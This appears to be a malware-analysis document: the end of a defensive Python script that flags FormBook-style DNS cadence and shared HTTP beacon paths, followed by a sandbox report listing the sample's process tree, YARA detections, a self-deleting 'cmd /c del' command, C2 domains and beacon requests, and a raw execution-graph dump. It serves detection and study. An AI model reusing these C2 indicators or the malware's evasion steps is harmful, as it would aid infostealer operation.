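                                  in UNUSUAL_HTTP_CLIENTS for r, _ in items)})
    return alerts

# Records copied from the tables above (client 192.168.2.4, resolver 1.1.1.1).
DNS_QUERIES = [DnsQuery(parse_ts(t), "192.168.2.4", n) for t, n in [
    ("Dec 23, 2024 13:57:34.434173107 CET", "www.imxtld.club"),
    ("Dec 23, 2024 13:57:54.730197906 CET", "www.ux-design-courses-53497.bond"),
    ("Dec 23, 2024 13:58:14.589582920 CET", "www.vytech.net"),
    ("Dec 23, 2024 13:58:35.663893938 CET", "www.lebahsemesta57.click"),
    ("Dec 23, 2024 13:58:45.971921921 CET", "api.msn.com"),  # benign noise
    ("Dec 23, 2024 13:58:58.943607092 CET", "www.7b5846.online"),
]]
_EXPLORER = r"C:\Windows\explorer.exe"
HTTP_REQUESTS = [HttpRequest(parse_ts(t), "192.168.2.4", h, _EXPLORER, line,
                             {"Host": h, "Connection": "close"}) for t, h, line in [
    ("Dec 23, 2024 13:58:15.235980034 CET", "www.vytech.net",
     "GET /hwu6/?NvW8gh=3eE7W8JGsE0Z0gf0dkzWoMqC44Ih/LpQP6YOK8HSo/jc9NPr5lNFbiMzFCC+b/Y1vVpG&1bd=qBZpwRT8rpbTOZn HTTP/1.1"),
    ("Dec 23, 2024 13:58:36.401154041 CET", "www.lebahsemesta57.click",
     "GET /hwu6/?NvW8gh=ODu4ekR727XBQcKUwHIo8nVNut1O1Z6HvIEUsjxvVtHRsmxVrOVq8qUINChS6+VnMtr8&1bd=qBZpwRT8rpbTOZn HTTP/1.1"),
    ("Dec 23, 2024 13:58:59.466643095 CET", "www.7b5846.online",
     "GET /hwu6/?adoHn6=uXc87hFXpvg4&Rl7=YeF1y3FAQJcqH3tuWfJk7b1+zf3Y35LdyPqCzn7ElcW/f++Fd6XCLGgtd1rezRCsTdps HTTP/1.1"),
]]

if __name__ == "__main__":
    for a in dns_cadence_alerts(DNS_QUERIES) + shared_path_alerts(HTTP_REQUESTS):
        print(a)
```

The DNS heuristic keys on cadence rather than on the domain names, because the candidate list changes per campaign while the fixed sleep between tries does not; the HTTP heuristic keys on the shared path, which across the three sessions here is the only token that stays constant while the host and the parameter names change.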


                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                    Start time:07:56:56
                                                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                    Imagebase:0xec0000
                                                                                                                                                                                                                                                    File size:1'482'240 bytes
                                                                                                                                                                                                                                                    MD5 hash:B96E6785937BD52B1281FB98F0ABCF25
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                                                                                    Start time:07:56:57
                                                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\file.exe"
Imagebase:0xb0000
File size:46'504 bytes
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:high
Has exited:true

Target ID:2
Start time:07:56:57
Start date:23/12/2024
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\Explorer.EXE
Imagebase:0x7ff72b770000
File size:5'141'208 bytes
MD5 hash:662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:3
Start time:07:57:00
Start date:23/12/2024
Path:C:\Windows\SysWOW64\autoconv.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\SysWOW64\autoconv.exe"
Imagebase:0xad0000
File size:842'752 bytes
MD5 hash:A705C2ACED7DDB71AFB87C4ED384BED6
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:4
Start time:07:57:00
Start date:23/12/2024
Path:C:\Windows\SysWOW64\wlanext.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\SysWOW64\wlanext.exe"
Imagebase:0xdd0000
File size:78'336 bytes
MD5 hash:0D5F0A7CA2A8A47E3A26FB1CB67E118C
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:moderate
Has exited:false

Target ID:5
Start time:07:57:03
Start date:23/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:07:57:03
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

                                                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                                                    Start time:07:58:38
                                                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 2580 -s 5640
                                                                                                                                                                                                                                                    Imagebase:0x7ff637350000
                                                                                                                                                                                                                                                    File size:570'736 bytes
                                                                                                                                                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                                                    Start time:07:58:40
                                                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:explorer.exe
                                                                                                                                                                                                                                                    Imagebase:0x7ff72b770000
                                                                                                                                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:false


Execution Graph

Execution Coverage:4%
Dynamic/Decrypted Code Coverage:0.4%
Signature Coverage:3.7%
Total number of Nodes:2000
Total number of Limit Nodes:158
eee5de 93262->93234 93263->93238 93264->93238 93265->93233 93266->93262 93275 ef5bb1 93267->93275 93269 ef63e2 93269->93247 93270->93244 93271->93247 93272->93250 93273->93252 93274->93254 93278 ef5bbd __freefls@4 93275->93278 93276 ef5bcf 93277 ee7c0e __fseek_nolock 47 API calls 93276->93277 93279 ef5bd4 93277->93279 93278->93276 93280 ef5c06 93278->93280 93281 ee6e10 __gmtime64_s 8 API calls 93279->93281 93282 ef5c78 __wsopen_helper 110 API calls 93280->93282 93285 ef5bde __freefls@4 93281->93285 93283 ef5c23 93282->93283 93284 ef5c4c __wsopen_helper LeaveCriticalSection 93283->93284 93284->93285 93285->93269 93290 ec42f6 93286->93290 93289 ec42cc LoadLibraryA GetProcAddress 93289->93163 93291 ec42aa 93290->93291 93292 ec42ff LoadLibraryA 93290->93292 93291->93163 93291->93289 93292->93291 93293 ec4310 GetProcAddress 93292->93293 93293->93291 93295 edf4ea 48 API calls 93294->93295 93296 ec47c9 93295->93296 93296->93172 93298 ec4085 FindResourceExW 93297->93298 93300 ec40a2 93297->93300 93299 f34f16 LoadResource 93298->93299 93298->93300 93299->93300 93301 f34f2b SizeofResource 93299->93301 93300->93171 93301->93300 93302 f34f3f LockResource 93301->93302 93302->93300 93304 f34fe0 93303->93304 93305 ec4526 93303->93305 93309 ee3a8d 93305->93309 93307 ec4534 93307->93183 93308->93171 93310 ee3a99 __freefls@4 93309->93310 93311 ee3aa7 93310->93311 93312 ee3acd 93310->93312 93322 ee7c0e 47 API calls __getptd_noexit 93311->93322 93324 ee4e1c 93312->93324 93315 ee3aac 93323 ee6e10 8 API calls __gmtime64_s 93315->93323 93317 ee3ad3 93330 ee39fe 81 API calls 3 library calls 93317->93330 93319 ee3ae2 93331 ee3b04 LeaveCriticalSection LeaveCriticalSection _fseek 93319->93331 93321 ee3ab7 __freefls@4 93321->93307 93322->93315 93323->93321 93325 ee4e4e EnterCriticalSection 93324->93325 93326 ee4e2c 93324->93326 93328 ee4e44 93325->93328 93326->93325 93327 ee4e34 93326->93327 93329 ee7cf4 __lock 47 API calls 93327->93329 93328->93317 93329->93328 93330->93319 93331->93321 
93335 ee3839 93332->93335 93334 ec4510 93334->93191 93336 ee3845 __freefls@4 93335->93336 93337 ee385b _memset 93336->93337 93338 ee3888 93336->93338 93339 ee3880 __freefls@4 93336->93339 93362 ee7c0e 47 API calls __getptd_noexit 93337->93362 93340 ee4e1c __lock_file 48 API calls 93338->93340 93339->93334 93341 ee388e 93340->93341 93348 ee365b 93341->93348 93344 ee3875 93363 ee6e10 8 API calls __gmtime64_s 93344->93363 93352 ee3676 _memset 93348->93352 93355 ee3691 93348->93355 93349 ee3681 93463 ee7c0e 47 API calls __getptd_noexit 93349->93463 93351 ee3686 93464 ee6e10 8 API calls __gmtime64_s 93351->93464 93352->93349 93352->93355 93360 ee36cf 93352->93360 93364 ee38c2 LeaveCriticalSection LeaveCriticalSection _fseek 93355->93364 93356 ee37e0 _memset 93466 ee7c0e 47 API calls __getptd_noexit 93356->93466 93360->93355 93360->93356 93365 ee2933 93360->93365 93372 eeee0e 93360->93372 93443 eeeb66 93360->93443 93465 eeec87 47 API calls 4 library calls 93360->93465 93362->93344 93363->93339 93364->93339 93366 ee293d 93365->93366 93367 ee2952 93365->93367 93368 ee7c0e __fseek_nolock 47 API calls 93366->93368 93367->93360 93369 ee2942 93368->93369 93370 ee6e10 __gmtime64_s 8 API calls 93369->93370 93371 ee294d 93370->93371 93371->93360 93373 eeee2f 93372->93373 93374 eeee46 93372->93374 93375 ee7bda __chsize_nolock 47 API calls 93373->93375 93376 eef57e 93374->93376 93380 eeee80 93374->93380 93377 eeee34 93375->93377 93378 ee7bda __chsize_nolock 47 API calls 93376->93378 93379 ee7c0e __fseek_nolock 47 API calls 93377->93379 93381 eef583 93378->93381 93423 eeee3b 93379->93423 93382 eeee88 93380->93382 93388 eeee9f 93380->93388 93383 ee7c0e __fseek_nolock 47 API calls 93381->93383 93385 ee7bda __chsize_nolock 47 API calls 93382->93385 93384 eeee94 93383->93384 93387 ee6e10 __gmtime64_s 8 API calls 93384->93387 93386 eeee8d 93385->93386 93392 ee7c0e __fseek_nolock 47 API calls 93386->93392 93387->93423 93389 eeeeb4 93388->93389 93391 eeeece 93388->93391 93393 eeeeec 
93388->93393 93388->93423 93390 ee7bda __chsize_nolock 47 API calls 93389->93390 93390->93386 93391->93389 93398 eeeed9 93391->93398 93392->93384 93395 ee69d0 __malloc_crt 47 API calls 93393->93395 93396 eeeefc 93395->93396 93399 eeef1f 93396->93399 93400 eeef04 93396->93400 93397 ef3bf2 __stbuf 47 API calls 93401 eeefed 93397->93401 93398->93397 93404 eef82f __lseeki64_nolock 49 API calls 93399->93404 93402 ee7c0e __fseek_nolock 47 API calls 93400->93402 93403 eef066 ReadFile 93401->93403 93408 eef003 GetConsoleMode 93401->93408 93405 eeef09 93402->93405 93406 eef088 93403->93406 93407 eef546 GetLastError 93403->93407 93409 eeef2d 93404->93409 93410 ee7bda __chsize_nolock 47 API calls 93405->93410 93406->93407 93416 eef058 93406->93416 93411 eef046 93407->93411 93412 eef553 93407->93412 93413 eef017 93408->93413 93414 eef063 93408->93414 93409->93398 93415 eeef14 93410->93415 93421 ee7bed __dosmaperr 47 API calls 93411->93421 93425 eef04c 93411->93425 93417 ee7c0e __fseek_nolock 47 API calls 93412->93417 93413->93414 93418 eef01d ReadConsoleW 93413->93418 93414->93403 93415->93423 93416->93425 93426 eef0bd 93416->93426 93435 eef32a 93416->93435 93419 eef558 93417->93419 93418->93416 93420 eef040 GetLastError 93418->93420 93422 ee7bda __chsize_nolock 47 API calls 93419->93422 93420->93411 93421->93425 93422->93425 93423->93360 93424 ee1c9d _free 47 API calls 93424->93423 93425->93423 93425->93424 93427 eef129 ReadFile 93426->93427 93433 eef1aa 93426->93433 93430 eef14a GetLastError 93427->93430 93441 eef154 93427->93441 93429 eef430 ReadFile 93436 eef453 GetLastError 93429->93436 93442 eef461 93429->93442 93430->93441 93431 eef267 93437 eef82f __lseeki64_nolock 49 API calls 93431->93437 93438 eef217 MultiByteToWideChar 93431->93438 93432 eef257 93434 ee7c0e __fseek_nolock 47 API calls 93432->93434 93433->93425 93433->93431 93433->93432 93433->93438 93434->93425 93435->93425 93435->93429 93436->93442 93437->93438 93438->93420 93438->93425 93439 eef82f 
__lseeki64_nolock 49 API calls 93439->93441 93440 eef82f __lseeki64_nolock 49 API calls 93440->93442 93441->93426 93441->93439 93442->93435 93442->93440 93444 eeeb71 93443->93444 93447 eeeb86 93443->93447 93445 ee7c0e __fseek_nolock 47 API calls 93444->93445 93446 eeeb76 93445->93446 93448 ee6e10 __gmtime64_s 8 API calls 93446->93448 93449 eeebbb 93447->93449 93450 ef3e24 __getbuf 47 API calls 93447->93450 93454 eeeb81 93447->93454 93448->93454 93451 ee2933 __fseek_nolock 47 API calls 93449->93451 93450->93449 93452 eeebcf 93451->93452 93453 eeed06 __filbuf 62 API calls 93452->93453 93455 eeebd6 93453->93455 93454->93360 93455->93454 93456 ee2933 __fseek_nolock 47 API calls 93455->93456 93457 eeebf9 93456->93457 93457->93454 93458 ee2933 __fseek_nolock 47 API calls 93457->93458 93459 eeec05 93458->93459 93459->93454 93460 ee2933 __fseek_nolock 47 API calls 93459->93460 93461 eeec12 93460->93461 93462 ee2933 __fseek_nolock 47 API calls 93461->93462 93462->93454 93463->93351 93464->93355 93465->93360 93466->93351 93470 ee344a GetSystemTimeAsFileTime 93467->93470 93469 f0bdc3 93469->93193 93471 ee3478 __aulldiv 93470->93471 93471->93469 93473 ee3e71 __freefls@4 93472->93473 93474 ee3e7f 93473->93474 93475 ee3e94 93473->93475 93486 ee7c0e 47 API calls __getptd_noexit 93474->93486 93477 ee4e1c __lock_file 48 API calls 93475->93477 93479 ee3e9a 93477->93479 93478 ee3e84 93487 ee6e10 8 API calls __gmtime64_s 93478->93487 93488 ee3b0c 55 API calls 5 library calls 93479->93488 93482 ee3e8f __freefls@4 93482->93197 93483 ee3ea5 93489 ee3ec5 LeaveCriticalSection LeaveCriticalSection _fseek 93483->93489 93485 ee3eb7 93485->93482 93486->93478 93487->93482 93488->93483 93489->93485 93495 f0c581 __tzset_nolock _wcscmp 93490->93495 93491 ec44ed 64 API calls 93491->93495 93492 f0c417 93492->93114 93492->93142 93493 f0bf5a GetSystemTimeAsFileTime 93493->93495 93494 ec4517 83 API calls 93494->93495 93495->93491 93495->93492 93495->93493 93495->93494 93497 f0b970 93496->93497 93498 
f0b97e 93496->93498 93499 ee3499 117 API calls 93497->93499 93500 f0b9c3 93498->93500 93501 ee3499 117 API calls 93498->93501 93511 f0b987 93498->93511 93499->93498 93527 f0bbe8 93500->93527 93503 f0b9a8 93501->93503 93503->93500 93505 f0b9b1 93503->93505 93504 f0ba07 93506 f0ba0b 93504->93506 93507 f0ba2c 93504->93507 93510 ee35e4 __fcloseall 83 API calls 93505->93510 93505->93511 93509 f0ba18 93506->93509 93513 ee35e4 __fcloseall 83 API calls 93506->93513 93531 f0b7e5 93507->93531 93509->93511 93516 ee35e4 __fcloseall 83 API calls 93509->93516 93510->93511 93511->93143 93513->93509 93514 f0ba5a 93540 f0ba8a 93514->93540 93515 f0ba3a 93518 ee35e4 __fcloseall 83 API calls 93515->93518 93519 f0ba47 93515->93519 93516->93511 93518->93519 93519->93511 93521 ee35e4 __fcloseall 83 API calls 93519->93521 93521->93511 93524 f0ba75 93524->93511 93526 ee35e4 __fcloseall 83 API calls 93524->93526 93526->93511 93528 f0bc0d 93527->93528 93530 f0bbf6 __tzset_nolock ___crtGetEnvironmentStringsW 93527->93530 93529 ee381e __fread_nolock 64 API calls 93528->93529 93529->93530 93530->93504 93532 ee395c _W_store_winword 47 API calls 93531->93532 93533 f0b7f4 93532->93533 93534 ee395c _W_store_winword 47 API calls 93533->93534 93535 f0b808 93534->93535 93536 ee395c _W_store_winword 47 API calls 93535->93536 93538 f0b81c 93536->93538 93537 f0bb64 47 API calls 93539 f0b82f 93537->93539 93538->93537 93538->93539 93539->93514 93539->93515 93547 f0baa0 93540->93547 93541 f0bb51 93573 f0bd8a 93541->93573 93542 f0b841 64 API calls 93542->93547 93544 f0ba61 93548 f0bb64 93544->93548 93547->93541 93547->93542 93547->93544 93569 f0bc67 93547->93569 93577 f0b942 64 API calls 93547->93577 93549 f0bb71 93548->93549 93551 f0bb77 93548->93551 93550 ee1c9d _free 47 API calls 93549->93550 93550->93551 93552 f0bb88 93551->93552 93553 ee1c9d _free 47 API calls 93551->93553 93554 f0ba68 93552->93554 93555 ee1c9d _free 47 API calls 93552->93555 93553->93552 93554->93524 93556 ee35e4 93554->93556 
93555->93554 93557 ee35f0 __freefls@4 93556->93557 93558 ee361c 93557->93558 93559 ee3604 93557->93559 93561 ee4e1c __lock_file 48 API calls 93558->93561 93565 ee3614 __freefls@4 93558->93565 93611 ee7c0e 47 API calls __getptd_noexit 93559->93611 93563 ee362e 93561->93563 93562 ee3609 93612 ee6e10 8 API calls __gmtime64_s 93562->93612 93595 ee3578 93563->93595 93565->93524 93571 f0bc76 93569->93571 93572 f0bcb6 93569->93572 93571->93547 93572->93571 93578 f0bd3d 93572->93578 93574 f0bda8 93573->93574 93575 f0bd97 93573->93575 93574->93544 93576 ee2aae 80 API calls 93575->93576 93576->93574 93577->93547 93579 f0bd7a 93578->93579 93580 f0bd69 93578->93580 93579->93572 93582 ee2aae 93580->93582 93583 ee2aba __freefls@4 93582->93583 93584 ee2aec 93583->93584 93585 ee2ad4 93583->93585 93586 ee2ae4 __freefls@4 93583->93586 93587 ee4e1c __lock_file 48 API calls 93584->93587 93588 ee7c0e __fseek_nolock 47 API calls 93585->93588 93586->93579 93589 ee2af2 93587->93589 93590 ee2ad9 93588->93590 93591 ee2957 78 API calls 93589->93591 93592 ee6e10 __gmtime64_s 8 API calls 93590->93592 93593 ee2b06 93591->93593 93592->93586 93594 ee2b24 LeaveCriticalSection LeaveCriticalSection 93593->93594 93594->93586 93596 ee359b 93595->93596 93597 ee3587 93595->93597 93609 ee3597 93596->93609 93614 ee2c84 93596->93614 93647 ee7c0e 47 API calls __getptd_noexit 93597->93647 93599 ee358c 93648 ee6e10 8 API calls __gmtime64_s 93599->93648 93605 ee2933 __fseek_nolock 47 API calls 93606 ee35b5 93605->93606 93624 eee9d2 93606->93624 93608 ee35bb 93608->93609 93610 ee1c9d _free 47 API calls 93608->93610 93613 ee3653 LeaveCriticalSection LeaveCriticalSection _fseek 93609->93613 93610->93609 93611->93562 93612->93565 93613->93565 93615 ee2c97 93614->93615 93616 ee2cbb 93614->93616 93615->93616 93617 ee2933 __fseek_nolock 47 API calls 93615->93617 93620 eeeb36 93616->93620 93618 ee2cb4 93617->93618 93649 eeaf61 93618->93649 93621 ee35af 93620->93621 93622 eeeb43 93620->93622 93621->93605 93622->93621 
93623 ee1c9d _free 47 API calls 93622->93623 93623->93621 93625 eee9de __freefls@4 93624->93625 93626 eee9fe 93625->93626 93627 eee9e6 93625->93627 93629 eeea7b 93626->93629 93634 eeea28 93626->93634 93698 ee7bda 47 API calls __getptd_noexit 93627->93698 93702 ee7bda 47 API calls __getptd_noexit 93629->93702 93630 eee9eb 93699 ee7c0e 47 API calls __getptd_noexit 93630->93699 93633 eeea80 93703 ee7c0e 47 API calls __getptd_noexit 93633->93703 93674 eea8ed 93634->93674 93637 eeea88 93704 ee6e10 8 API calls __gmtime64_s 93637->93704 93638 eeea2e 93640 eeea4c 93638->93640 93641 eeea41 93638->93641 93700 ee7c0e 47 API calls __getptd_noexit 93640->93700 93683 eeea9c 93641->93683 93643 eee9f3 __freefls@4 93643->93608 93645 eeea47 93701 eeea73 LeaveCriticalSection __unlock_fhandle 93645->93701 93647->93599 93648->93609 93650 eeaf6d __freefls@4 93649->93650 93651 eeaf8d 93650->93651 93652 eeaf75 93650->93652 93654 eeb022 93651->93654 93658 eeafbf 93651->93658 93653 ee7bda __chsize_nolock 47 API calls 93652->93653 93655 eeaf7a 93653->93655 93656 ee7bda __chsize_nolock 47 API calls 93654->93656 93657 ee7c0e __fseek_nolock 47 API calls 93655->93657 93659 eeb027 93656->93659 93660 eeaf82 __freefls@4 93657->93660 93661 eea8ed ___lock_fhandle 49 API calls 93658->93661 93662 ee7c0e __fseek_nolock 47 API calls 93659->93662 93660->93616 93663 eeafc5 93661->93663 93664 eeb02f 93662->93664 93665 eeafeb 93663->93665 93666 eeafd8 93663->93666 93667 ee6e10 __gmtime64_s 8 API calls 93664->93667 93669 ee7c0e __fseek_nolock 47 API calls 93665->93669 93668 eeb043 __chsize_nolock 75 API calls 93666->93668 93667->93660 93670 eeafe4 93668->93670 93671 eeaff0 93669->93671 93673 eeb01a __flush LeaveCriticalSection 93670->93673 93672 ee7bda __chsize_nolock 47 API calls 93671->93672 93672->93670 93673->93660 93676 eea8f9 __freefls@4 93674->93676 93675 eea946 EnterCriticalSection 93678 eea96c __freefls@4 93675->93678 93676->93675 93677 ee7cf4 __lock 47 API calls 93676->93677 93679 eea91d 
